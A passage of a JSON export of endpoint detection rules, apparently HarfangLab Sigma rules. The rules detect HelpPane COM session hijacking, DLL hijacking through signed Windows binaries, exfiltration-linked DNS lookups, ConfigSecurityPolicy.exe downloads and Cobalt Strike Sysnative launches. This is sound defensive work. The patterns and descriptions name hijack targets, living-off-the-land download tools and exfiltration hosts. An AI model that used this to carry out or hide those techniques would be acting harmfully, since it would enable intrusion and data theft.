"name": "t1656_helppane_server_execution.yml",
"content": "title: Suspicious Process Execution via HelpPane Server\nid: 6199a4d5-4143-4df6-a486-94005a5bb643\ndescription: |\n Detects suspicious child process execution by HelpPane server.\n Threat actors can abuse the IHxHelpPaneServer COM object, configured to run as an Interactive User, to hijack specified user sessions.\n This session hijacking technique is an alternative to remote process injection or dumping lsass, and may come in handy when operators need to keylog, screenshot, or access LDAP as the affected user.\n It is recommended to check the process created for suspicious activities.\nreferences:\n - https://cicada-8.medium.com/process-injection-is-dead-long-live-ihxhelppaneserver-af8f20431b5d\n - https://github.com/3lp4tr0n/SessionHop/\n - https://projectzero.google/2016/01/raising-dead.html\n - https://attack.mitre.org/techniques/T1656/\ndate: 2025/12/11\nmodified: 2025/12/23\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1656\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n ParentCommandLine: '?:\\Windows\\helppane.exe -Embedding'\n\n filter_web_browsers:\n - ProcessOriginalFileName:\n - 'firefox.exe'\n - 'chrome.exe'\n - 'brave.exe'\n - 'msedge.exe'\n - 'opera.exe'\n - 'vivaldi.exe'\n - 'iexplore.exe'\n - 'msedgewebview2.exe'\n - 'DuckDuckGo.exe'\n - 'AvastBrowser.exe'\n - 'BrowserSelector.exe'\n - 'CCleanerBrowser.exe'\n - ProcessCommandLine|contains: 'https://go.microsoft.com/fwlink/?LinkId'\n\n filter_image:\n Image:\n - '?:\\Windows\\HelpPane.exe'\n - '?:\\Windows\\System32\\WerFault.exe'\n - '?:\\Windows\\System32\\taskmgr.exe'\n - '?:\\Program Files (x86)\\Ivanti\\Workspace Control\\pwrgate.exe'\n - '?:\\Program Files\\WindowsApps\\Microsoft.GetHelp_*\\GetHelp.exe'\n\n condition: selection and not 1 of filter_*\nlevel: medium\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "6199a4d5-4143-4df6-a486-94005a5bb643",
"rule_name": "Suspicious Process Execution via HelpPane Server",
"rule_description": "Detects suspicious child process execution by HelpPane server.\nThreat actors can abuse the IHxHelpPaneServer COM object, configured to run as an Interactive User, to hijack specified user sessions.\nThis session hijacking technique is an alternative to remote process injection or dumping lsass, and may come in handy when operators need to keylog, screenshot, or access LDAP as the affected user.\nIt is recommended to check the process created for suspicious activities.\n",
"rule_creation_date": "2025-12-11",
"rule_modified_date": "2025-12-23",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1656"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "61a4909c-c5a7-41e6-8b80-4e682f09d4ae",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.097109Z",
"creation_date": "2026-03-23T11:45:34.097111Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.097116Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://wietze.github.io/blog/save-the-environment-variables",
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_finger.yml",
"content": "title: DLL Hijacking via finger.exe\nid: 61a4909c-c5a7-41e6-8b80-4e682f09d4ae\ndescription: |\n Detects potential Windows DLL Hijacking via finger.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://wietze.github.io/blog/save-the-environment-variables\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'finger.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\mswsock.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "61a4909c-c5a7-41e6-8b80-4e682f09d4ae",
"rule_name": "DLL Hijacking via finger.exe",
"rule_description": "Detects potential Windows DLL Hijacking via finger.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "61a74a91-1f17-4c6d-a936-40478cbc9e21",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.626986Z",
"creation_date": "2026-03-23T11:45:34.626989Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.626993Z",
"rule_level": "high",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://www.vincentyiu.com/red-team/domain-fronting/trycloudflare-infrastructure-and-domain-fronting",
"https://attack.mitre.org/techniques/T1102/002/",
"https://attack.mitre.org/techniques/T1090/004/",
"https://attack.mitre.org/techniques/T1048/003/"
],
"name": "t1102_002_susp_domain_dns_linux.yml",
"content": "title: Suspicious Domain Name Resolved (Linux)\nid: 61a74a91-1f17-4c6d-a936-40478cbc9e21\ndescription: |\n Detects a DNS resolution by an uncommon process to web services commonly used by attackers to exfiltrate or download malicious binaries.\n Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system.\n It is recommended to check if the process has legitimate reason to communicate with the service.\nreferences:\n - https://www.vincentyiu.com/red-team/domain-fronting/trycloudflare-infrastructure-and-domain-fronting\n - https://attack.mitre.org/techniques/T1102/002/\n - https://attack.mitre.org/techniques/T1090/004/\n - https://attack.mitre.org/techniques/T1048/003/\ndate: 2024/09/10\nmodified: 2026/02/10\nauthor: HarfangLab\ntags:\n - attack.command_and_control\n - attack.t1102.002\n - attack.t1090.004\n - attack.t1071.004\n - attack.exfiltration\n - attack.t1048.003\n - classification.Linux.Source.DnsQuery\n - classification.Linux.Behavior.Exfiltration\n - classification.Linux.Behavior.CommandAndControl\nlogsource:\n product: linux\n category: dns_query\ndetection:\n selection:\n QueryName|endswith:\n - '.trycloudflare.com'\n - '.pages.dev'\n - '.w3spaces.com'\n - '.workers.dev'\n ProcessImage|contains: '?'\n\n exclusion_dns_server:\n ProcessImage:\n - '/usr/sbin/named'\n - '/lib/systemd/systemd-resolved'\n - '/usr/lib/systemd/systemd-resolved'\n - '/usr/sbin/unbound'\n - '/usr/sbin/pdns_recursor'\n - '/usr/sbin/squid'\n - '/usr/sbin/nscd'\n - '/usr/local/nessy2/bin/named'\n\n exclusion_proxy:\n ProcessImage:\n - '/usr/sbin/squid'\n - '/usr/sbin/squid-gnutls'\n - '*/traefik'\n - '/usr/bin/traffic_server'\n\n exclusion_misc:\n ProcessImage: '/usr/sbin/samba'\n\n exclusion_browser:\n ProcessImage|endswith:\n - '/firefox-esr'\n - '/firefox-bin'\n - '/firefox'\n - '/waterfox'\n - '/msedge'\n - '/chrome'\n - '/librewolf'\n - '/chromium'\n - '/chromium-browser'\n - '/thorium'\n - '/brave'\n - 
'/vivaldi-bin'\n - '/xdg-desktop-portal'\n - '/opera'\n\n exclusion_mailer:\n - ProcessCommandLine:\n - '/usr/bin/perl -T /usr/sbin/amavisd*'\n - '/usr/sbin/amavisd-new (master)'\n - 'MailScanner: starting child'\n - '/opt/zimbra/common/sbin/amavisd (master)'\n - '/usr/sbin/amavisd (master)'\n - ProcessParentCommandLine: '/usr/sbin/amavisd (master)'\n\n exclusion_ublock:\n QueryName:\n - 'ublockorigin.pages.dev'\n - 'malware-filter.pages.dev'\n - 'phishing-filter.pages.dev'\n\n exclusion_image:\n ProcessImage:\n - '/usr/bin/dockerd'\n - '/opt/zen/zen'\n - '/home/*/.local/bin/zen-folder/zen'\n - '/opt/Rocket.Chat/rocketchat-desktop'\n - '/usr/libexec/gvfsd-http'\n - '/opt/stremio/stremio'\n - '/usr/bin/dig'\n - '/usr/local/lib/qutebrowser/.venv/bin/python3'\n\n exclusion_ancestors:\n ProcessAncestors|contains: '|/usr/share/code/code|'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "61a74a91-1f17-4c6d-a936-40478cbc9e21",
"rule_name": "Suspicious Domain Name Resolved (Linux)",
"rule_description": "Detects a DNS resolution by an uncommon process to web services commonly used by attackers to exfiltrate or download malicious binaries.\nAdversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system.\nIt is recommended to check if the process has a legitimate reason to communicate with the service.\n",
"rule_creation_date": "2024-09-10",
"rule_modified_date": "2026-02-10",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control",
"attack.exfiltration"
],
"rule_technique_tags": [
"attack.t1048.003",
"attack.t1071.004",
"attack.t1090.004",
"attack.t1102.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "61ae1266-56f1-4aa8-82e3-d1b2ba0b3aae",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.091235Z",
"creation_date": "2026-03-23T11:45:34.091238Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.091242Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://lolbas-project.github.io/lolbas/Binaries/ConfigSecurityPolicy/",
"https://attack.mitre.org/techniques/T1105/",
"https://attack.mitre.org/techniques/T1567/"
],
"name": "t1567_config_security_policy.yml",
"content": "title: File Downloaded or Exfiltrated via ConfigSecurityPolicy.exe\nid: 61ae1266-56f1-4aa8-82e3-d1b2ba0b3aae\ndescription: |\n Detects a suspicious execution of the ConfigSecurityPolicy.exe executable to download or exfiltrate a file.\n If a file was downloaded, it will be saved in one of these locations:\n - %LocalAppData%\\Microsoft\\Windows\\INetCache\\<8_RANDOM_ALNUM_CHARS>\\[1].\n - %LocalAppData%\\Microsoft\\Windows\\INetCache\\IE\\<8_RANDOM_ALNUM_CHARS>\\[1].\n Adversaries may transfer tools or exfiltrate files using legitimate tools to evade detection.\n It is recommended to check the content of the downloaded file and look for other suspicious behavior in the user's session.\nreferences:\n - https://lolbas-project.github.io/lolbas/Binaries/ConfigSecurityPolicy/\n - https://attack.mitre.org/techniques/T1105/\n - https://attack.mitre.org/techniques/T1567/\ndate: 2024/12/06\nmodified: 2025/04/11\nauthor: HarfangLab\ntags:\n - attack.command_and_control\n - attack.t1105\n - attack.defense_evasion\n - attack.t1218\n - attack.exfiltration\n - attack.t1567\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.ConfigSecurityPolicy\n - classification.Windows.Behavior.FileDownload\n - classification.Windows.Behavior.CommandAndControl\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.Exfiltration\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_exe_image:\n - Image|endswith: '\\ConfigSecurityPolicy.exe'\n # Renamed binaries\n - OriginalFileName: 'ConfigSecurityPolicy.exe'\n\n selection_cmdline:\n CommandLine|contains:\n - 'http'\n - 'ftp://'\n\n exclusion_xml_config:\n CommandLine|contains: 'http://forefront.microsoft.com/'\n\n condition: all of selection_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "61ae1266-56f1-4aa8-82e3-d1b2ba0b3aae",
"rule_name": "File Downloaded or Exfiltrated via ConfigSecurityPolicy.exe",
"rule_description": "Detects a suspicious execution of the ConfigSecurityPolicy.exe executable to download or exfiltrate a file.\nIf a file was downloaded, it will be saved in one of these locations:\n - %LocalAppData%\\Microsoft\\Windows\\INetCache\\<8_RANDOM_ALNUM_CHARS>\\[1].\n - %LocalAppData%\\Microsoft\\Windows\\INetCache\\IE\\<8_RANDOM_ALNUM_CHARS>\\[1].\nAdversaries may transfer tools or exfiltrate files using legitimate tools to evade detection.\nIt is recommended to check the content of the downloaded file and look for other suspicious behavior in the user's session.\n",
"rule_creation_date": "2024-12-06",
"rule_modified_date": "2025-04-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control",
"attack.defense_evasion",
"attack.exfiltration"
],
"rule_technique_tags": [
"attack.t1105",
"attack.t1218",
"attack.t1567"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "61b86bcc-88c6-41c4-bb7d-d811859e298c",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.097754Z",
"creation_date": "2026-03-23T11:45:34.097756Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.097760Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://github.com/xforcered/WFH",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://securelist.com/a-new-secret-stash-for-fileless-malware/106393/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_werfault.yml",
"content": "title: DLL Hijacking via werfault.exe\nid: 61b86bcc-88c6-41c4-bb7d-d811859e298c\ndescription: |\n Detects potential Windows DLL Hijacking via werfault.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://securelist.com/a-new-secret-stash-for-fileless-malware/106393/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'werfault.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\cryptsp.dll'\n - '\\dbgcore.DLL'\n - '\\dbghelp.dll'\n - '\\faultrep.dll'\n - '\\wer.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n - '?:\\ProgramData\\docker\\windowsfilter\\\\*\\Files\\Windows\\System32\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft 
Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "61b86bcc-88c6-41c4-bb7d-d811859e298c",
"rule_name": "DLL Hijacking via werfault.exe",
"rule_description": "Detects potential Windows DLL Hijacking via werfault.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers use this technique by copying a legitimate Windows-signed executable from System32 or SysWOW64 to a non-standard directory and planting the malicious DLL in the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "61c74714-e399-40ba-85c2-22fedaa60471",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.084931Z",
"creation_date": "2026-03-23T11:45:34.084933Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.084938Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://posts.specterops.io/a-deep-dive-into-cobalt-strike-malleable-c2-6660e33b0e0b",
"https://labs.f-secure.com/archive/persistence-architecture-matters/",
"https://attack.mitre.org/techniques/T1055/",
"https://attack.mitre.org/software/S0154/"
],
"name": "t1055_suspicious_execution_from_sysnative.yml",
"content": "title: Process Executed from the Sysnative Folder\nid: 61c74714-e399-40ba-85c2-22fedaa60471\ndescription: |\n Detects the execution of a process from the Sysnative folder.\n This can be the result of Cobalt Strike's exploitation via spawnto settings to launch temporary jobs through a legitimate binary.\n It is recommended to investigate the binary launched in the Sysnative to look for malicious content or actions as well as to look for Cobalt Strike-related alerts on the host.\nreferences:\n - https://posts.specterops.io/a-deep-dive-into-cobalt-strike-malleable-c2-6660e33b0e0b\n - https://labs.f-secure.com/archive/persistence-architecture-matters/\n - https://attack.mitre.org/techniques/T1055/\n - https://attack.mitre.org/software/S0154/\ndate: 2022/01/25\nmodified: 2026/03/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1055\n - attack.s0154\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Framework.CobaltStrike\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_commandline:\n CommandLine|startswith: '?:\\Windows\\sysnative\\'\n selection_parameters:\n # Command-line with no parameters\n CommandLine|contains: ' '\n\n exclusion_programfiles:\n ParentImage|startswith:\n - '?:\\Program Files\\'\n - '?:\\Program Files (x86)\\'\n\n exclusion_mobaxterm:\n # C:\\Program Files (x86)\\Mobatek\\MobaXterm\\MobaXterm.exe\n - CommandLine: '?:\\WINDOWS\\Sysnative\\WindowsPowerShell\\v1.0\\powershell.exe'\n ParentImage|endswith: '\\bin\\winpty-agent.exe'\n GrandparentImage|endswith: '\\bin\\conin.exe'\n - ParentImage|endswith: '?:\\Users\\\\*\\MobaXterm\\slash\\bin\\bash.exe'\n\n exclusion_kms:\n CommandLine: '?:\\Windows\\SysNative\\Vmw.exe'\n Signed: 'true'\n Signature: 'Microsoft Windows'\n OriginalFileName: 'Vmw.exe'\n\n exclusion_razer:\n CommandLine: '?:\\WINDOWS\\sysnative\\snippingtool'\n GrandparentImage: '?:\\Program Files (x86)\\Razer\\Synapse3\\Service\\Razer Synapse 
Service.exe'\n\n exclusion_sqlserver:\n CommandLine: '?:\\Windows\\sysnative\\WindowsPowerShell\\v1.0\\PowerShell.exe'\n # C:\\Program Files (x86)\\Microsoft SQL Server\\140\\Tools\\Binn\\ManagementStudio\\Ssms.exe\n # C:\\Program Files (x86)\\Microsoft SQL Server Management Studio 19\\Common7\\IDE\\Ssms.exe\n ProcessParentOriginalFileName: 'SSMS.EXE'\n ProcessParentSigned: 'true'\n ProcessParentSignature: 'Microsoft Corporation'\n\n # https://www.tranquil.it/\n exclusion_tranquil:\n - ProcessGrandparentProduct|contains: 'WAPTSetup' # Multiple space at the end\n ProcessGrandparentSigned: 'true'\n ProcessGrandparentSignature: 'Tranquil I.T. Systems'\n - ProcessGrandparentDescription|contains: 'WAPTSetup Setup'\n ProcessGrandparentCompany|contains: 'Tranquil IT'\n ProcessGrandparentImage:\n - '*\\waptagent.exe'\n - '*\\waptagent\\waptsetup.exe'\n\n exclusion_lenovo:\n ProcessParentOriginalFileName: 'lenovoupdate.exe'\n ProcessParentSigned: 'true'\n ProcessParentSignature: 'Lenovo (Beijing) Limited'\n\n exclusion_vscode:\n ProcessGrandparentImage|endswith: '\\Code.exe'\n ProcessGrandparentOriginalFileName: 'electron.exe'\n ProcessGrandparentSigned: 'true'\n ProcessGrandparentSignature: 'Microsoft Corporation'\n\n exclusion_tanium:\n - ProcessParentImage|endswith: '\\TaniumClient.exe'\n ProcessParentDescription: 'Tanium Client'\n ProcessParentCompany: 'Tanium Inc.'\n - ProcessGrandparentImage: '?:\\Program Files (x86)\\Tanium\\Tanium Client\\TaniumClient.exe'\n\n exclusion_ccm:\n - ParentImage|startswith: '?:\\Windows\\ccmcache\\'\n - Ancestors|contains: '?:\\Windows\\CCM\\CcmExec.exe'\n\n condition: selection_commandline and not selection_parameters and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "61c74714-e399-40ba-85c2-22fedaa60471",
"rule_name": "Process Executed from the Sysnative Folder",
"rule_description": "Detects the execution of a process from the Sysnative folder.\nThis can be the result of Cobalt Strike's exploitation via spawnto settings to launch temporary jobs through a legitimate binary.\nThe Sysnative alias is only resolved for 32-bit (WOW64) processes, so a command line starting with this path indicates a 32-bit parent process launching a 64-bit binary.\nIt is recommended to investigate the binary launched from the Sysnative folder to look for malicious content or actions, as well as to look for Cobalt Strike-related alerts on the host.\n",
"rule_creation_date": "2022-01-25",
"rule_modified_date": "2026-03-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1055"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "61ca4c01-0a75-4353-a620-f06226512ea0",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.587785Z",
"creation_date": "2026-03-23T11:45:34.587789Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.587797Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://github.com/xforcered/WFH",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_spaceagent.yml",
"content": "title: DLL Hijacking via spaceagent.exe\nid: 61ca4c01-0a75-4353-a620-f06226512ea0\ndescription: |\n Detects potential Windows DLL Hijacking via spaceagent.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'spaceagent.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\netapi32.dll'\n - '\\NETUTILS.DLL'\n - '\\SRVCLI.DLL'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "61ca4c01-0a75-4353-a620-f06226512ea0",
"rule_name": "DLL Hijacking via spaceagent.exe",
